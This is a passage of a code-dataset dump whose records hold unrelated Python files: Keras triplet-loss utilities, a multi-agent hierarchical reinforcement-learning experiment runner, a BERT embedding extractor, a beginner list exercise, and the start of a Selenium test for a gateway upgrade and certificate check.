address_manager.address_add(addresses)\n\n messages.info(request, 'SQL generated and executed on development database successfully.')\n request.attributes = {'sql_name': sql_name}\n\n return render(request, 'common/result.html')","sub_path":"webapp/view/address_view.py","file_name":"address_view.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"193519547","text":"import os\nimport numpy as np\nnp.random.seed(0)\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom keras.models import Sequential\nfrom keras import optimizers\nfrom keras.optimizers import Adam\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate, Dropout, Convolution2D\nfrom keras.models import Model\nfrom keras.datasets import cifar10\nfrom keras.datasets import mnist\n\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers.merge import Concatenate\nfrom keras.layers.core import Lambda, Flatten, Dense\nfrom keras.initializers import glorot_uniform,he_uniform\n\nfrom keras.engine.topology import Layer\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom keras.utils import plot_model,normalize\n\n\nnb_classes = 10\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef add_top(model):\n \n inp = model.get_input_at(0)\n x = model.layers[-1].output\n \n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n x = Dropout(dense_dropout)(x)\n x = Dense(num_classes)(x)\n x = Activation('softmax')(x)\n \n new_model = Model(inp, x)\n \n return new_model\n\n\ndef remove_top(model):\n model.layers.pop()\n model.layers.pop()\n model.layers.pop()\n model.layers.pop()\n model.layers.pop()\n\n inp = model.input\n out = model.layers[-6].output\n\n network = Model(inp, out)\n \n return network\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef buildDataSet(cifar=False):\n \"\"\"Build dataset for train and test\n \n \n returns:\n dataset : list of length 10 containing images for each classes of shape (?,28,28,1)\n \"\"\"\n \n if cifar:\n (x_train_origin, y_train_origin), (x_test_origin, y_test_origin) = cifar10.load_data()\n img_rows, img_cols, channels = 32, 32, 3\n input_shape = (img_rows, img_cols, channels)\n else:\n (x_train_origin, y_train_origin), (x_test_origin, y_test_origin) = mnist.load_data()\n img_rows, img_cols, channels = 28, 28, 1\n input_shape = (img_rows, img_cols, channels)\n \n \n assert K.image_data_format() == 'channels_last'\n x_train_origin = x_train_origin.reshape(x_train_origin.shape[0], img_rows, img_cols, channels)\n x_test_origin = x_test_origin.reshape(x_test_origin.shape[0], img_rows, img_cols, channels)\n \n dataset_train = []\n dataset_test = []\n \n #Sorting images by classes and normalize values 0=>1\n for n in range(nb_classes):\n images_class_n = np.asarray([row for idx,row in enumerate(x_train_origin) if y_train_origin[idx]==n])\n dataset_train.append(images_class_n/255.)\n \n images_class_n = np.asarray([row for idx,row in enumerate(x_test_origin) if y_test_origin[idx]==n])\n dataset_test.append(images_class_n/255.)\n \n return dataset_train, dataset_test, x_train_origin, y_train_origin, x_test_origin, y_test_origin\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\nnb_classes = 10\nimg_rows, img_cols = 32, 32\ninput_shape = (img_rows, img_cols, 3)\n\ndataset_train, dataset_test, x_train_origin, y_train_origin, x_test_origin, y_test_origin = buildDataSet(cifar=True)\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\nclass TripletLossLayer(Layer):\n def __init__(self, alpha, **kwargs):\n self.alpha = alpha\n super(TripletLossLayer, self).__init__(**kwargs)\n \n \n def triplet_loss(self, inputs):\n anchor, positive, negative = inputs\n p_dist = K.sum(K.square(anchor-positive), axis=-1)\n n_dist = K.sum(K.square(anchor-negative), axis=-1)\n return K.sum(K.maximum(p_dist - n_dist + self.alpha, 0), axis=0)\n \n '''\n def triplet_loss(self, inputs):\n anchor, positive, negative = inputs\n p_dist = K.sqrt(K.sum(K.square(anchor-positive), axis=-1))\n n_dist = K.sqrt(K.sum(K.square(anchor-negative), axis=-1))\n return K.sum(K.maximum((p_dist - n_dist + self.alpha)/64.0, 0), axis=0)\n '''\n \n def call(self, inputs):\n loss = self.triplet_loss(inputs)\n self.add_loss(loss)\n return loss\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef build_model(input_shape, network, margin=0.2):\n '''\n Define the Keras Model for training \n Input : \n input_shape : shape of input images\n network : Neural network to train outputing embeddings\n margin : minimal distance between Anchor-Positive and Anchor-Negative for the lossfunction (alpha)\n \n '''\n # Define the tensors for the three input images\n anchor_input = Input(input_shape, name=\"anchor_input\")\n positive_input = Input(input_shape, name=\"positive_input\")\n negative_input = Input(input_shape, name=\"negative_input\") \n \n # Generate the encodings (feature vectors) for the three images\n encoded_a = network(anchor_input)\n encoded_p = network(positive_input)\n encoded_n = network(negative_input)\n \n #TripletLoss Layer\n loss_layer = TripletLossLayer(alpha=margin,name='triplet_loss_layer')([encoded_a,encoded_p,encoded_n])\n \n # Connect the inputs with the outputs\n network_train = Model(inputs=[anchor_input,positive_input,negative_input],outputs=loss_layer)\n \n # return the model\n return network_train\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef get_batch_random(batch_size,s=\"train\"):\n \"\"\"\n Create batch of APN triplets with a complete random strategy\n \n Arguments:\n batch_size -- integer \n\n Returns:\n triplets -- list containing 3 tensors A,P,N of shape (batch_size,w,h,c)\n \"\"\"\n if s == 'train':\n X = dataset_train\n else:\n X = dataset_test\n\n m, w, h,c = X[0].shape\n \n \n # initialize result\n triplets=[np.zeros((batch_size,h, w,c)) for i in range(3)]\n \n for i in range(batch_size):\n #Pick one random class for anchor\n anchor_class = np.random.randint(0, nb_classes)\n nb_sample_available_for_class_AP = X[anchor_class].shape[0]\n \n #Pick two different random pics for this class => A and P\n [idx_A,idx_P] = np.random.choice(nb_sample_available_for_class_AP,size=2,replace=False)\n \n #Pick another class for N, different from anchor_class\n negative_class = (anchor_class + np.random.randint(1,nb_classes)) % nb_classes\n nb_sample_available_for_class_N = X[negative_class].shape[0]\n \n #Pick a random pic for this negative class => N\n idx_N = np.random.randint(0, nb_sample_available_for_class_N)\n\n triplets[0][i,:,:,:] = X[anchor_class][idx_A,:,:,:]\n triplets[1][i,:,:,:] = X[anchor_class][idx_P,:,:,:]\n triplets[2][i,:,:,:] = X[negative_class][idx_N,:,:,:]\n\n return triplets\n\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef compute_dist(a,b):\n return np.sum(np.square(a-b))\n\ndef get_batch_hard(draw_batch_size,hard_batchs_size,norm_batchs_size,network,s=\"train\"):\n \"\"\"\n Create batch of APN \"hard\" triplets\n \n Arguments:\n draw_batch_size -- integer : number of initial randomly taken samples \n hard_batchs_size -- interger : select the number of hardest samples to keep\n norm_batchs_size -- interger : number of random samples to add\n\n Returns:\n triplets -- list containing 3 tensors A,P,N of shape (hard_batchs_size+norm_batchs_size,w,h,c)\n \"\"\"\n if s == 'train':\n X = dataset_train\n else:\n X = dataset_test\n\n m, w, h,c = X[0].shape\n \n \n #Step 1 : pick a random batch to study\n studybatch = get_batch_random(draw_batch_size,s)\n \n #Step 2 : compute the loss with current network : d(A,P)-d(A,N). The alpha parameter here is omited here since we want only to order them\n studybatchloss = np.zeros((draw_batch_size))\n \n #Compute embeddings for anchors, positive and negatives\n A = network.predict(studybatch[0])\n P = network.predict(studybatch[1])\n N = network.predict(studybatch[2])\n \n #Compute d(A,P)-d(A,N)\n studybatchloss = np.sum(np.square(A-P),axis=1) - np.sum(np.square(A-N),axis=1)\n \n #Sort by distance (high distance first) and take the \n selection = np.argsort(studybatchloss)[::-1][:hard_batchs_size]\n \n #Draw other random samples from the batch\n selection2 = np.random.choice(np.delete(np.arange(draw_batch_size),selection),norm_batchs_size,replace=False)\n \n selection = np.append(selection,selection2)\n \n triplets = [studybatch[0][selection,:,:,:], studybatch[1][selection,:,:,:], studybatch[2][selection,:,:,:]]\n \n return triplets\n\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\ndef compute_probs(network,X,Y):\n '''\n Input\n network : current NN to compute embeddings\n X : tensor of shape (m,w,h,1) containing pics to evaluate\n Y : tensor of shape (m,) containing true class\n \n Returns\n probs : array of shape (m,m) containing distances\n \n '''\n m = X.shape[0]\n nbevaluation = int(m*(m-1)/2)\n probs = np.zeros((nbevaluation))\n y = np.zeros((nbevaluation))\n \n #Compute all embeddings for all pics with current network\n embeddings = network.predict(X)\n \n size_embedding = embeddings.shape[1]\n \n #For each pics of our dataset\n k = 0\n for i in range(m):\n #Against all other images\n for j in range(i+1,m):\n #compute the probability of being the right decision : it should be 1 for right class, 0 for all other classes\n probs[k] = -compute_dist(embeddings[i,:],embeddings[j,:])\n if (Y[i]==Y[j]):\n y[k] = 1\n else:\n y[k] = 0\n k += 1\n return probs,y\n\ndef compute_metrics(probs,yprobs):\n '''\n Returns\n fpr : Increasing false positive rates such that element i is the false positive rate of predictions with score >= thresholds[i]\n tpr : Increasing true positive rates such that element i is the true positive rate of predictions with score >= thresholds[i].\n thresholds : Decreasing thresholds on the decision function used to compute fpr and tpr. thresholds[0] represents no instances being predicted and is arbitrarily set to max(y_score) + 1\n auc : Area Under the ROC Curve metric\n '''\n # calculate AUC\n auc = roc_auc_score(yprobs, probs)\n # calculate roc curve\n fpr, tpr, thresholds = roc_curve(yprobs, probs)\n \n return fpr, tpr, thresholds,auc\n\ndef compute_interdist(network):\n '''\n Computes sum of distances between all classes embeddings on our reference test image: \n d(0,1) + d(0,2) + ... + d(0,9) + d(1,2) + d(1,3) + ... d(8,9)\n A good model should have a large distance between all theses embeddings\n \n Returns:\n array of shape (nb_classes,nb_classes) \n '''\n res = np.zeros((nb_classes,nb_classes))\n \n ref_images = np.zeros((nb_classes,img_rows,img_cols,1))\n \n #generates embeddings for reference images\n for i in range(nb_classes):\n ref_images[i,:,:,:] = dataset_test[i][0,:,:,:]\n ref_embeddings = network.predict(ref_images)\n \n for i in range(nb_classes):\n for j in range(nb_classes):\n res[i,j] = dist(ref_embeddings[i],ref_embeddings[j])\n return res\n \ndef find_nearest(array,value):\n idx = np.searchsorted(array, value, side=\"left\")\n if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):\n return array[idx-1],idx-1\n else:\n return array[idx],idx\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\n\n\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------\n\n\n","sub_path":"custom_lib/triplet_utils.py","file_name":"triplet_utils.py","file_ext":"py","file_size_in_byte":14483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"86579889","text":"import numpy as np\nimport random, time\n\nfrom tester.tester import Tester\nfrom Agent.ihrl_agent import IhrlAgent\nfrom Environments.rendezvous.gridworld_env import GridWorldEnv\nfrom Environments.rendezvous.multi_agent_gridworld_env import MultiAgentGridWorldEnv\nfrom Environments.coop_buttons.multi_agent_buttons_env import MultiAgentButtonsEnv\nimport matplotlib.pyplot as plt\nimport math\n\ndef run_ihrl_training(epsilon,\n tester,\n agent_list,\n show_print=True):\n \"\"\"\n This code runs one i-hrl training episode. q-functions, and accumulated reward values of agents\n are updated accordingly. If the appropriate number of steps have elapsed, this function will\n additionally run a test episode.\n\n Parameters\n ----------\n epsilon : float\n Numerical value in (0,1) representing likelihood of choosing a random action.\n tester : Tester object\n Object containing necessary information for current experiment.\n agent_list : list of Agent objects\n Agent objects to be trained and tested.\n show_print : bool\n Optional flag indicating whether or not to print output statements to terminal.\n \"\"\"\n # Initializing parameters and the game\n learning_params = tester.learning_params\n testing_params = tester.testing_params\n \n num_agents = len(agent_list)\n if tester.experiment == 'rendezvous':\n training_env = MultiAgentGridWorldEnv(tester.rm_test_file, num_agents, tester.env_settings)\n if tester.experiment == 'buttons':\n training_env = MultiAgentButtonsEnv(tester.rm_test_file, num_agents, tester.env_settings)\n\n for i in range(num_agents):\n agent_list[i].reset_state()\n agent_list[i].reset_option()\n\n s_team = np.full(num_agents, -1, dtype=int)\n a_team = np.full(num_agents, -1, dtype=int)\n testing_reward = 0\n\n mc_rewards = dict()\n for i in range(num_agents):\n mc_rewards[i] = []\n\n num_steps = learning_params.max_timesteps_per_task\n\n for t in range(num_steps):\n # Update step count\n tester.add_step()\n\n for i in range(num_agents):\n if t == 0:\n current_meta_state = training_env.get_meta_state(i)\n avail_meta_action_indeces = training_env.get_avail_meta_action_indeces(i)\n meta_action = agent_list[i].get_next_meta_action(current_meta_state, avail_meta_action_indeces, epsilon, learning_params)\n agent_list[i].current_option = agent_list[i].options_list[meta_action]\n agent_list[i].option_start_state = training_env.get_meta_state(i)\n agent_list[i].option_complete = False\n\n if agent_list[i].option_complete:\n # Update the meta controller\n option_start_state = agent_list[i].option_start_state\n current_meta_state = training_env.get_meta_state(i)\n meta_action = agent_list[i].options_list.index(agent_list[i].current_option)\n agent_list[i].update_meta_q_function(option_start_state, current_meta_state, meta_action, mc_rewards[i], learning_params)\n\n # choose the next meta action\n avail_meta_action_indeces = training_env.get_avail_meta_action_indeces(i)\n meta_action = agent_list[i].get_next_meta_action(current_meta_state, avail_meta_action_indeces, epsilon, learning_params)\n agent_list[i].current_option = agent_list[i].options_list[meta_action]\n agent_list[i].option_start_state = current_meta_state\n agent_list[i].option_complete = False\n mc_rewards[i] = []\n\n # Perform a team step\n for i in range(num_agents):\n s = agent_list[i].s\n s_team[i] = s\n a_team[i] = agent_list[i].get_next_action(epsilon, learning_params)\n\n r, _, s_team_next = training_env.environment_step(s_team, a_team)\n\n for i in range(num_agents):\n mc_rewards[i].append(r)\n\n completed_options = training_env.get_completed_options(s_team_next)\n\n for i in range(num_agents):\n # a = training_env.get_last_action(i)\n avail_options = training_env.get_avail_options(i)\n agent_list[i].update_agent(s_team_next[i], avail_options, a_team[i], r, completed_options, learning_params, update_q_function=True)\n if agent_list[i].current_option in completed_options:\n agent_list[i].option_complete = True\n\n # If enough steps have elapsed, test and save the performance of the agents.\n if testing_params.test and tester.get_current_step() % testing_params.test_freq == 0:\n t_init = time.time()\n step = tester.get_current_step()\n\n agent_list_copy = []\n\n # Need to create a copy of the agent for testing. If we pass the agent directly\n # mid-episode to the test function, the test will reset the world-state and reward machine \n # state before the training episode has been completed.\n for i in range(num_agents):\n options_list = agent_list[i].options_list\n s_i = agent_list[i].s_i\n num_states = agent_list[i].num_states\n num_meta_states = agent_list[i].num_meta_states\n actions = agent_list[i].actions\n agent_id = agent_list[i].agent_id\n agent_copy = IhrlAgent(options_list, s_i, num_states, num_meta_states, actions, agent_id)\n # Pass only the q-functions by reference so that the testing updates the original agent's q-function.\n agent_copy.q_dict = agent_list[i].q_dict\n agent_copy.meta_q = agent_list[i].meta_q\n\n agent_list_copy.append(agent_copy)\n\n # Run a test of the performance of the agents\n testing_reward, trajectory, testing_steps = run_ihrl_test(agent_list_copy,\n tester,\n learning_params,\n testing_params,\n show_print=show_print)\n \n if 0 not in tester.results.keys():\n tester.results[0] = {}\n if step not in tester.results[0]:\n tester.results[0][step] = []\n tester.results[0][step].append(testing_reward)\n\n # Save the testing trace\n if 'trajectories' not in tester.results.keys():\n tester.results['trajectories'] = {}\n if step not in tester.results['trajectories']:\n tester.results['trajectories'][step] = []\n tester.results['trajectories'][step].append(trajectory)\n\n # Save how many steps it took to complete the task\n if 'testing_steps' not in tester.results.keys():\n tester.results['testing_steps'] = {}\n if step not in tester.results['testing_steps']:\n tester.results['testing_steps'][step] = []\n tester.results['testing_steps'][step].append(testing_steps)\n\n if len(tester.steps) == 0 or tester.steps[-1] < step:\n tester.steps.append(step)\n\n # If the task is complete, update the meta controllers and stop trying to complete it.\n env_rm_state = training_env.u\n if training_env.reward_machine.is_terminal_state(env_rm_state):\n for i in range(num_agents):\n # Update the meta controller\n option_start_state = agent_list[i].option_start_state\n current_meta_state = training_env.get_meta_state(i)\n meta_action = agent_list[i].options_list.index(agent_list[i].current_option)\n agent_list[i].update_meta_q_function(option_start_state, current_meta_state, meta_action, mc_rewards[i], learning_params)\n \n # Make sure we've run at least the minimum number of training steps before breaking the loop\n if tester.stop_task(t):\n break\n\n # checking the steps time-out\n if tester.stop_learning():\n break\n\ndef run_ihrl_test(agent_list,\n tester,\n learning_params,\n testing_params,\n show_print=True):\n \"\"\"\n Run a test of the hrl method with the current q-function. \n\n Parameters\n ----------\n agent_list : list of Agent objects\n Agent objects to be trained and tested.\n tester : Tester object\n Object containing necessary information for current experiment.\n learning_params : LearningParameters object\n Object storing parameters to be used in learning.\n Testing_params : TestingParameters object\n Object storing parameters to be used in testing.\n show_print : bool\n Optional flag indicating whether or not to print output statements to terminal.\n\n Ouputs\n ------\n testing_reard : float\n Reward achieved by agent during this test episode.\n trajectory : list\n List of dictionaries containing information on current step of test.\n step : int\n Number of testing steps required to complete the task.\n \"\"\"\n num_agents = len(agent_list)\n if tester.experiment == 'rendezvous':\n testing_env = MultiAgentGridWorldEnv(tester.rm_test_file, num_agents, tester.env_settings)\n if tester.experiment == 'buttons':\n testing_env = MultiAgentButtonsEnv(tester.rm_test_file, num_agents, tester.env_settings)\n\n for i in range(num_agents):\n agent_list[i].reset_state()\n agent_list[i].reset_option()\n\n s_team = np.full(num_agents, -1, dtype=int)\n a_team = np.full(num_agents, -1, dtype=int)\n testing_reward = 0\n\n mc_rewards = dict()\n for i in range(num_agents):\n mc_rewards[i] = []\n\n trajectory = []\n step = 0\n\n # agent_list[0].meta_q[:,0] = 1\n # agent_list[0].meta_q[0,0] = 0\n # agent_list[0].meta_q[0,1] = 1\n # agent_list[0].meta_q[7,0] = 0\n # agent_list[0].meta_q[7,2] = 1\n\n # agent_list[1].meta_q[:,0] = 1\n # agent_list[1].meta_q[1,0] = 0\n # agent_list[1].meta_q[1,1] = 1\n # agent_list[1].meta_q[3,0] = 0\n # agent_list[1].meta_q[3,2] = 1\n\n # agent_list[2].meta_q[:,0] = 1\n # agent_list[2].meta_q[3,0] = 0\n # agent_list[2].meta_q[3,1] = 1\n\n # Starting interaction with the environment\n for t in range(testing_params.num_steps):\n step = step + 1\n\n for i in range(num_agents):\n if t == 0:\n current_meta_state = testing_env.get_meta_state(i)\n avail_meta_action_indeces = testing_env.get_avail_meta_action_indeces(i)\n meta_action = agent_list[i].get_next_meta_action(current_meta_state, avail_meta_action_indeces, -1, learning_params)\n agent_list[i].current_option = agent_list[i].options_list[meta_action]\n agent_list[i].option_start_state = testing_env.get_meta_state(i)\n agent_list[i].option_complete = False\n\n if agent_list[i].option_complete:\n # choose the next meta action\n current_meta_state = testing_env.get_meta_state(i)\n avail_meta_action_indeces = testing_env.get_avail_meta_action_indeces(i)\n meta_action = agent_list[i].get_next_meta_action(current_meta_state, avail_meta_action_indeces, -1, learning_params)\n agent_list[i].current_option = agent_list[i].options_list[meta_action]\n agent_list[i].option_start_state = current_meta_state\n agent_list[i].option_complete = False\n mc_rewards[i] = []\n\n # print('Meta sate: {}, Agent 1: {}, Agent 2: {}, Agent 3: {}'.format(testing_env.get_meta_state(1), agent_list[0].current_option, agent_list[1].current_option, agent_list[2].current_option))\n\n # Perform a team step\n for i in range(num_agents):\n s = agent_list[i].s\n s_team[i] = s\n a_team[i] = agent_list[i].get_next_action(-1.0, learning_params)\n\n # trajectory.append({'s' : np.array(s_team, dtype=int), 'a' : np.array(a_team, dtype=int), 'meta_state': testing_env.get_meta_state(i)})\n\n r, _, s_team_next = testing_env.environment_step(s_team, a_team)\n testing_reward = testing_reward + r\n\n for i in range(num_agents):\n mc_rewards[i].append(r)\n\n completed_options = testing_env.get_completed_options(s_team_next)\n\n for i in range(num_agents):\n # a = testing_env.get_last_action(i)\n avail_options = testing_env.get_avail_options(i)\n agent_list[i].update_agent(s_team_next[i], avail_options, a_team[i], r, completed_options, learning_params, update_q_function=False)\n if agent_list[i].current_option in completed_options:\n agent_list[i].option_complete = True\n\n # If the task is complete, update all meta controllers and stop trying to complete it.\n env_rm_state = testing_env.u\n if testing_env.reward_machine.is_terminal_state(env_rm_state):\n break\n\n if show_print:\n print('Reward of {} achieved in {} steps. Current step: {} of {}'.format(testing_reward, step, tester.current_step, tester.total_steps))\n\n return testing_reward, trajectory, step\n\ndef run_ihrl_experiment(tester,\n num_agents,\n num_times,\n show_print=True):\n \"\"\"\n Run the entire q-learning with reward machines experiment a number of times specified by num_times.\n\n Inputs\n ------\n tester : Tester object\n Test object holding true reward machine and all information relating\n to the particular tasks, world, learning parameters, and experimental results.\n num_agents : int\n Number of agents in this experiment.\n num_times : int\n Number of times to run the entire experiment (restarting training from scratch).\n show_print : bool\n Flag indicating whether or not to output text to the terminal.\n \"\"\"\n \n learning_params = tester.learning_params\n\n for t in range(num_times):\n # Reseting default step values\n tester.restart()\n\n rm_test_file = tester.rm_test_file\n rm_learning_file_list = tester.rm_learning_file_list\n\n # Verify that the number of local reward machines matches the number of agents in the experiment.\n assertion_string = \"Number of specified local reward machines must match specified number of agents.\"\n assert (len(rm_learning_file_list) == num_agents), assertion_string\n\n if tester.experiment == 'rendezvous':\n testing_env = MultiAgentGridWorldEnv(rm_test_file, num_agents, tester.env_settings)\n if tester.experiment == 'buttons':\n testing_env = MultiAgentButtonsEnv(rm_test_file, num_agents, tester.env_settings)\n\n num_states = testing_env.num_states\n\n # Create the a list of agents for this experiment\n agent_list = [] \n for i in range(num_agents):\n # The actions available to individual agents should be specified by the TRUE multi-agent environment.\n actions = testing_env.get_actions(i)\n s_i = testing_env.get_initial_state(i)\n num_meta_states = testing_env.get_num_meta_states(i)\n options_list = testing_env.get_options_list(i)\n agent_list.append(IhrlAgent(options_list, s_i, num_states, num_meta_states, actions, i))\n\n num_episodes = 0\n\n # Task loop\n epsilon = learning_params.initial_epsilon\n\n while not tester.stop_learning():\n num_episodes += 1\n\n epsilon = epsilon * 0.99\n\n run_ihrl_training(epsilon,\n tester,\n agent_list,\n show_print=show_print)\n\n # Backing up the results\n print('Finished iteration ',t)\n\n tester.agent_list = agent_list\n\n plot_multi_agent_results(tester, num_agents)\n\ndef plot_multi_agent_results(tester, num_agents):\n \"\"\"\n Plot the results stored in tester.results for each of the agents.\n \"\"\"\n\n prc_25 = list()\n prc_50 = list()\n prc_75 = list()\n\n # Buffers for plots\n current_step = list()\n current_25 = list()\n current_50 = list()\n current_75 = list()\n steps = list()\n\n plot_dict = tester.results['testing_steps']\n\n for step in plot_dict.keys():\n if len(current_step) < 10:\n current_25.append(np.percentile(np.array(plot_dict[step]),25))\n current_50.append(np.percentile(np.array(plot_dict[step]),50))\n current_75.append(np.percentile(np.array(plot_dict[step]),75))\n current_step.append(sum(plot_dict[step])/len(plot_dict[step]))\n else:\n current_step.pop(0)\n current_25.pop(0)\n current_50.pop(0)\n current_75.pop(0)\n current_25.append(np.percentile(np.array(plot_dict[step]),25))\n current_50.append(np.percentile(np.array(plot_dict[step]),50))\n current_75.append(np.percentile(np.array(plot_dict[step]),75))\n current_step.append(sum(plot_dict[step])/len(plot_dict[step]))\n\n prc_25.append(sum(current_25)/len(current_25))\n prc_50.append(sum(current_50)/len(current_50))\n prc_75.append(sum(current_75)/len(current_75))\n steps.append(step)\n\n plt.plot(steps, prc_25, alpha=0)\n plt.plot(steps, prc_50, color='red')\n plt.plot(steps, prc_75, alpha=0)\n plt.grid()\n plt.fill_between(steps, prc_50, prc_25, color='red', alpha=0.25)\n plt.fill_between(steps, prc_50, prc_75, color='red', alpha=0.25)\n plt.ylabel('Testing Steps to Task Completion', fontsize=15)\n plt.xlabel('Training Steps', fontsize=15)\n plt.locator_params(axis='x', nbins=5)\n plt.show()","sub_path":"src/experiments/run_ihrl_experiment.py","file_name":"run_ihrl_experiment.py","file_ext":"py","file_size_in_byte":18005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"94336006","text":"from custom.bert_extractor import BertExtractor\nimport argparse\nimport pickle\nimport re\nimport spacy\nimport numpy as np\nfrom tqdm import tqdm\n\ndef read_file(path):\n print(\"loading spacy model\")\n nlp = spacy.load(\"en\", disable=['parser', 'tagger', 'ner'])\n nlp.add_pipe(nlp.create_pipe('sentencizer'))\n\n # index of doc sentences, doc key, all ssentences\n indices, keys, all_sents = [], [], []\n max_len = 0\n\n pattern = re.compile(r\"^([^\\t]*)\\t\\s*(.*)\")\n print(\"loading file & sentence breaking\")\n with open(path, \"r\") as f:\n for line in tqdm(f.readlines()):\n m = pattern.match(line.strip())\n if not m:\n continue\n keys.append(m.group(1))\n value = m.group(2)\n doc = nlp(value)\n sents = [sen.string.strip() for sen in doc.sents]\n max_len = max(max_len, max(map(len, doc.sents)))\n indices.append(list(range(len(all_sents), len(all_sents)+len(sents))))\n all_sents.extend(sents)\n\n print(\"max length of sentence %d\" % max_len)\n \n return indices, keys, all_sents\n \n\ndef main():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--input_file\", default=None, type=str, required=True)\n parser.add_argument(\"--output_file\", default=None, type=str, required=True)\n parser.add_argument(\"--bert_model\", default=None, type=str, required=True,\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-base-multilingual, bert-base-chinese.\")\n\n ## Other parameters\n parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using an uncased model.\")\n parser.add_argument(\"--layers\", default=\"-1,-2,-3,-4\", type=str)\n parser.add_argument(\"--max_seq_length\", default=128, type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. Sequences longer \"\n \"than this will be truncated, and sequences shorter than this will be padded.\")\n parser.add_argument(\"--batch_size\", default=32, type=int, help=\"Batch size for predictions.\")\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help = \"local_rank for distributed training on gpus\")\n parser.add_argument(\"--no_cuda\",\n action='store_true',\n help=\"Whether not to use CUDA when available\")\n\n args = parser.parse_args()\n\n indices, keys, all_sents = read_file(args.input_file)\n\n extractor = BertExtractor(\n bert_model=args.bert_model, \n do_lower_case=args.do_lower_case, \n layers=args.layers.split(','),\n reduce_method=\"sum\", \n max_seq_length=args.max_seq_length,\n batch_size=args.batch_size, \n local_rank=args.local_rank\n )\n\n features = extractor.extract(all_sents)\n\n print(\"merging sentences\")\n kv = {}\n for key, index in zip(keys, indices):\n kv[key] = np.average(np.array([features[idx] for idx in index]), axis=0)\n\n print(\"writing to path %s\" % args.output_file)\n with open(args.output_file, 'wb') as f:\n pickle.dump(kv, f)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"custom/run_extractor.py","file_name":"run_extractor.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"353356573","text":"\"\"\"\nList Exercises Programs\n\n\"\"\"\n\n# 1. Basic list operations\nnumbers = []\nfor i in range(0, 5):\n number = int(input(\"Number: \"))\n numbers.append(number)\nprint(f\"The first number is {numbers[0]}\")\nprint(f\"The last number is {numbers[-1]}\")\nnumbers.sort()\nprint(f\"The smallest number is {numbers[0]}\")\nprint(f\"The largest number is {numbers[-1]}\")\naverage = sum(numbers) / len(numbers)\nprint(f\"The average of the numbers is {average}\")\n\n# 2. Woefully inadequate security checker\nusernames = ['jimbo', 'giltson98', 'derekf', 'WhatSup', 'NicolEye', 'swei45', 'BaseInterpreterInterface', 'BaseStdIn',\n 'Command', 'ExecState', 'InteractiveConsole', 'InterpreterInterface', 'StartServer', 'bob']\nusername = input(\"Username: \")\nif username in usernames:\n print(\"Access Granted\")\nelse:\n print(\"Access Denied\")\n","sub_path":"prac_04/list_exercises.py","file_name":"list_exercises.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"594431447","text":"\"\"\"\r\nTest scenario: New certificate for security concerns is addressed and is deployed to the gateways.\r\nUpgrade to 121516.166 or later and disable the HTTPS cert\r\nDowngrade to the latest release 112816 and create two gateways then upgrade to the current version 121516.\r\nThen enable the HTTPS cert.\r\nCloud type tested: AWS, ARM and Gcloud\r\n\"\"\"\r\n\r\nimport unittest, logging, time, os\r\nfrom selenium import webdriver\r\nfrom autotest.lib.webui_pages import upgrade as upgd\r\nfrom autotest.lib.webui_pages import gateway\r\nimport autotest.lib.webui_pages.diagnostics as diag\r\nimport autotest.lib.webui_pages.actions_in_common as actions\r\nfrom autotest.lib.backend_utils import SSHCmd\r\nfrom autotest.frontend.webuitest import *\r\nfrom autotest.lib.test_utils import testcases\r\n\r\nclass SecurityWithCertificateTest(WebUITest):\r\n cases = testcases(__name__)\r\n\r\n def test01_upgrade_to_latest(self):\r\n upgrade_view = upgd.Upgrade(self.driver)\r\n actions_in_common = actions.ActionsInCommon(self.driver)\r\n diagnostic_view = diag.Diagnostics(self.driver)\r\n relogin = actions.UCCLogin(self.driver)\r\n\r\n self.logger.info(\"Navigating to Settings\")\r\n upgrade_view.navigate_to_settings()\r\n time.sleep(1)\r\n\r\n self.logger.info(\"Navigating to Upgrade\")\r\n upgrade_view.navigate_to_upgrade()\r\n 